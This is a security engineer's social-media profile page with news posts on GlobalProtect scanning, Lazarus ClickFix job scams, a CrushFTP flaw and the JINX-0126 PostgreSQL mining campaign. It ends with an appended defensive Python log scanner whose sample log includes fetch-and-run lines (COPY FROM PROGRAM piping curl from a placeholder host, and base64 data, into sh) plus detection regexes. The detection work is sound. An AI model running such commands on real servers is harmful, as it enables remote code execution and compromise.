Lenin alevski 🕵️💻

@alevsk@infosec.exchange
306 Followers
88 Following
177 Posts
#security Eng @google ♥️ To Build and Break Stuff. Wannabe #Hacker. Personal opinions, review my PR please
Blog: https://www.alevsk.com
PGP/MIT: 0x67BA54C7DE3DD14A
Link: https://linktr.ee/alevsk
Twitter: https://twitter.com/alevsk

Why did nearly 24,000 IP addresses suddenly start probing Palo Alto GlobalProtect gateways? 🔍🌐

Between March 17 and March 26, 2025, cybersecurity analysts observed a significant increase in login scanning activity targeting Palo Alto Networks PAN-OS GlobalProtect portals. At its peak, almost 24,000 unique IPs were involved, with daily traffic holding steady at around 20,000 before tapering off. Only a small subset—154 IPs—has been flagged as actively malicious, but the scale of the scanning suggests a broader reconnaissance effort.

GreyNoise, which tracks this kind of behavior, notes that such scanning often precedes attempts to exploit known or newly disclosed vulnerabilities. In fact, similar spikes in the past have aligned with new zero-days being revealed within weeks afterward. This pattern may indicate attackers are preparing for more targeted campaigns by first identifying unpatched or outdated systems that are exposed on the internet.

The geographic distribution offers further clues. Most of the scanning originated from North America and parts of Europe, while the targets were primarily in the U.S., U.K., Ireland, Russia, and Singapore. The focus appears to be on internet-facing instances, especially those that haven't been properly hardened or maintained.

Administrators running GlobalProtect should verify that their systems are up to date and consider implementing stricter access controls, such as multi-factor authentication and IP allowlists. Given the timing and scope, ignoring this kind of reconnaissance activity increases the risk of being caught in future exploitation campaigns.

#Infosec #Cybersecurity #Software #Technology #News #CTF #Cybersecuritycareer #hacking #redteam #blueteam #purpleteam #tips #opensource #cloudsecurity

— ✨
🔍 P.S. Found this helpful? Tap Follow for more cybersecurity tips and insights! I share weekly content for professionals and people who want to get into cyber. Happy hacking 💻🏴‍☠️

New Open-Source Tool Spotlight 🚨🚨🚨

Mapping your threat-hunting workflows to the MITRE ATT&CK framework? Check out olafhartong's ThreatHunting Splunk app. With 130+ reports and dashboards, it simplifies hunting while integrating Sysmon data for deep insights. Requires tuning for best results. #ThreatHunting #MITREATTACK

🔗 Project link on #GitHub 👉 https://github.com/olafhartong/ThreatHunting


How do you trick someone into installing malware without triggering alarms? 🕵️💻

North Korea’s Lazarus group is doing it using a method called ClickFix, blending social engineering with targeted job scams to infect victims — and steal cryptocurrency. According to security firm Sekoia, this latest campaign, dubbed *ClickFake Interview*, impersonates legitimate crypto firms like Coinbase, Kraken, or Robinhood. Victims are contacted via social media and invited to fake job interviews hosted on cloned websites.

The process looks legitimate: candidates fill out forms, answer questions, and are asked to record an introduction video. But when they try to enable their webcam, a fake error kicks off the attack. The page tells them to fix the issue by downloading a driver or copying and running command-line code — that's the ClickFix technique. It exploits the victim’s unfamiliarity with system-level actions, especially among non-technical professionals in centralized finance (CeFi).

Based on the victim's operating system (identified via their browser’s User-Agent), the attackers deploy different payloads. On macOS, a bash script downloads "FrostyFerret," a password stealer, followed by "GolangGhost," a backdoor. On Windows, a VBScript fetches GolangGhost via NodeJS. This implant gives Lazarus remote control over the target’s machine, allowing data exfiltration, including sensitive browser information.

While earlier Lazarus campaigns had targeted developers, this one specifically aims at individuals with weaker technical defenses. Meanwhile, other threat actors are also adopting ClickFix — for example, distributing Qakbot through LinkedIn-based scams.

Sekoia has released detection rules and indicators of compromise (IOCs) to help defenders identify and counter the campaign. The broader concern is this: ClickFix sidesteps traditional safeguards not with technical brute force, but by using trust as the primary weapon.


Ready for #RSAC 😁

New Open-Source Tool Spotlight 🚨🚨🚨

Scopify is a Python-based recon tool for pentesters, leveraging `netify.ai` to analyze CDNs, hosting, and SaaS infra of target companies. Optional OpenAI integration adds AI-guided insights for deeper testing. Built by @Jhaddix & Arcanum-Sec. #CyberSecurity #BugBounty

🔗 Project link on #GitHub 👉 https://github.com/Arcanum-Sec/Scopify


🚨 HackTheBay 2.0 is just around the corner — don’t miss this incredible cybersecurity event!

🎟️ Grab your tickets here: https://lu.ma/hackthebay2.0

πŸ™‹β€β™‚οΈ Want to get involved and make a meaningful impact on the security community? We're still looking for volunteers! Sign up here: https://docs.google.com/forms/d/e/1FAIpQLSezul4xKKtttvJ6yN7LSsYrr8FZFuu6i7BMxW4TKnlstJQMgw/viewform?fbzx=-3174919365540345050

Come hang out with like-minded individuals, network with security professionals, and level up your cybersecurity skills at HackTheBay!

📅 Date: Monday, April 28
🕙 Time: 10:00 AM – 5:00 PM
📍 Location: Public Works, San Francisco, California

HackTheBay 2025 · Luma

Are you going to be in San Francisco during BSidesSF and RSA 2025? Do you have plans for Monday? If not, we have something prepared for you. Pacific Hackers is…

How many unauthenticated file transfer servers are still exposed online in 2025? 🌐🔓

A critical flaw in CrushFTP, tracked as CVE-2025-2825, is being actively exploited in the wild. The vulnerability affects versions 10.0.0 through 10.8.3 and version 11.0.0, and it allows remote attackers to bypass authentication entirely using specially crafted HTTP or HTTPS requests. Public proof-of-concept code is already circulating, lowering the barrier for exploitation.

Shadowserver, a nonprofit security watchdog, reported that over 1,500 vulnerable instances remain online as of March 30, 2025. Just two days earlier, around 1,800 instances were detected, with more than half located in the U.S. These numbers suggest that many organizations haven't taken mitigation steps despite clear warnings.

The CrushFTP team has urged users to either patch immediately or, if an update isn't feasible, isolate installations using a DMZ configuration. This can reduce the attack surface but is not a long-term fix.

This type of vulnerability is particularly concerning because unauthenticated access to managed file transfer software often leads to sensitive data exposure or ransomware deployment. Groups like Cl0p have historically targeted platforms like MOVEit, Accellion FTA, and GoAnywhere MFT using similar flaws. In January, Cl0p claimed responsibility for exploiting Cleo file transfer software to breach dozens of companies.

CrushFTP's CVE-2025-2825 carries a CVSS score of 9.8. That reflects the ease of exploitation and the potential impact of compromise. For systems handling regulated or confidential data, the urgency is not optional—patching is essential.


New Open-Source Tool Spotlight 🚨🚨🚨

Mandiant's `capa` analyzes executable files to pinpoint their capabilities. From detecting HTTP communications to identifying persistence mechanisms, it helps analysts assess malware functionality quickly. Supports PE, ELF, .NET, shellcode, and sandbox reports. #malwareanalysis #cybersecurity

🔗 Project link on #GitHub 👉 https://github.com/fireeye/capa


If you're attending RSA Conference 2025 in San Francisco and want to level up your Kubernetes security skills, I’ll be giving a workshop this year at Cloud Village (@cloudvillage_dc ).

Join me as we explore both offensive and defensive strategies to break and secure Kubernetes clusters.

🗓 April 30
🕐 1:10 PM
📍 Sandbox at YBCA, Gallery 2

#RSAC #CloudSecurity #Kubernetes #Containers #CloudVillage #RedTeam #BlueTeam

https://rsa2025.cloud-village.org/


How can a simple SQL command open the door to full system takeover and cryptocurrency mining? 🐚🪙

A recent cloud attack campaign is exploiting misconfigured PostgreSQL servers, using legitimate database functionality to run malicious code on compromised systems. The operation, tracked by Wiz under the name JINX-0126, has targeted more than 1,500 exposed PostgreSQL instances so far. It builds on an earlier wave of attacks identified in mid-2024, but now includes more advanced evasion techniques.

At the core is the misuse of PostgreSQL's `COPY ... FROM PROGRAM` command. This command, intended for importing data, is leveraged to execute arbitrary shell commands directly on the host. Once inside, the attacker runs a Base64-decoded shell script that removes rival miners and installs a binary called PG_CORE.

A critical piece of this attack is an obfuscated Golang binary named *postmaster*. It mimics PostgreSQL’s real process, helping it blend in. It also sets up persistence through cron jobs, creates new privileged roles, and writes a binary named *cpu_hu* to disk.

That binary fetches and launches the XMRig cryptocurrency miner—without leaving files behind. It does so with Linux's `memfd_create` system call, which creates an anonymous in-memory file that the miner is executed from, so detection tools that only scan disk activity never see a dropped binary.

Each infected system is assigned a unique worker identity and connected to one of three Monero wallets controlled by the attacker. With about 550 active miners tied to each wallet, the impact spans at least 1,500 machines.

The broader issue is clear: many PostgreSQL services remain poorly secured with weak or default credentials. Combined with powerful features like programmatic file imports, they become easy targets for attackers looking to monetize unauthorized access without raising alarms.
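One way to hunt for the pattern this post describes in PostgreSQL statement logs, as an added example that is not part of the original post or of Wiz's research: it flags `COPY ... FROM PROGRAM` (and its sibling `TO PROGRAM`, which also hands a command to the server process and goes beyond what the post mentions) together with the creation or upgrade of privileged roles, then correlates both within one backend session. The log lines and the `log_line_prefix` layout (`'%m [%p] %u@%d '`) are constructed assumptions.

```python
import re

# Constructed sample of a PostgreSQL server log (not from the original page).
# Assumes log_statement = 'all' and log_line_prefix = '%m [%p] %u@%d '.
SAMPLE_LOG = """\
2025-04-01 10:02:11.123 UTC [4021] postgres@app LOG:  statement: SELECT id, name FROM customers WHERE id = 42
2025-04-01 10:02:15.456 UTC [4022] postgres@postgres LOG:  statement: COPY scratch FROM PROGRAM 'echo aGVsbG8= | base64 -d | sh'
2025-04-01 10:02:16.001 UTC [4022] postgres@postgres LOG:  statement: COPY scratch from program 'curl -s http://example.invalid/x | sh'
2025-04-01 10:02:17.789 UTC [4022] postgres@postgres LOG:  statement: CREATE ROLE svc_backup WITH SUPERUSER LOGIN PASSWORD 'redacted'
2025-04-01 10:02:18.000 UTC [4023] app@app LOG:  statement: COPY customers FROM '/tmp/customers.csv' CSV HEADER
2025-04-01 10:02:19.000 UTC [4024] app@app LOG:  statement: ALTER ROLE svc_backup WITH CREATEROLE
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$")
# COPY ... FROM PROGRAM is the primitive abused by JINX-0126; TO PROGRAM
# likewise runs a shell command as the server process.
COPY_PROGRAM_RE = re.compile(r"\bCOPY\b.*?\b(FROM|TO)\s+PROGRAM\b", re.I)
# New or upgraded privileged roles: the persistence step described in the post.
PRIV_ROLE_RE = re.compile(
    r"\b(CREATE|ALTER)\s+(ROLE|USER)\b.*?\b(SUPERUSER|CREATEROLE|BYPASSRLS)\b", re.I)


def scan_log(text):
    """Return one finding per suspicious statement. Ordinary DML and a plain
    COPY FROM a file are ignored, since only PROGRAM executes a command."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # continuation lines, non-statement log entries
        sql = m.group("sql")
        if COPY_PROGRAM_RE.search(sql):
            reason = "copy_program"
        elif PRIV_ROLE_RE.search(sql):
            reason = "privileged_role"
        else:
            continue
        findings.append({"ts": m.group("ts"), "pid": int(m.group("pid")),
                         "user": m.group("user"), "db": m.group("db"),
                         "reason": reason, "sql": sql})
    return findings


def sessions_with_chain(findings):
    """Backend pids that both ran a program via COPY and created/altered a
    privileged role: the shell-then-persistence sequence the post describes."""
    seen = {}
    for f in findings:
        seen.setdefault(f["pid"], set()).add(f["reason"])
    return sorted(p for p, r in seen.items() if {"copy_program", "privileged_role"} <= r)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ts']} pid={f['pid']} {f['user']}@{f['db']} {f['reason']}: {f['sql']}")
    print("sessions with shell + persistence chain:", sessions_with_chain(hits))
```

As a complementary preventive check, `COPY ... FROM PROGRAM` requires superuser or membership in the predefined `pg_execute_server_program` role (PostgreSQL 11 and later), so `SELECT rolname FROM pg_roles WHERE pg_has_role(oid, 'pg_execute_server_program', 'member');` lists every role that can reach the primitive at all.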
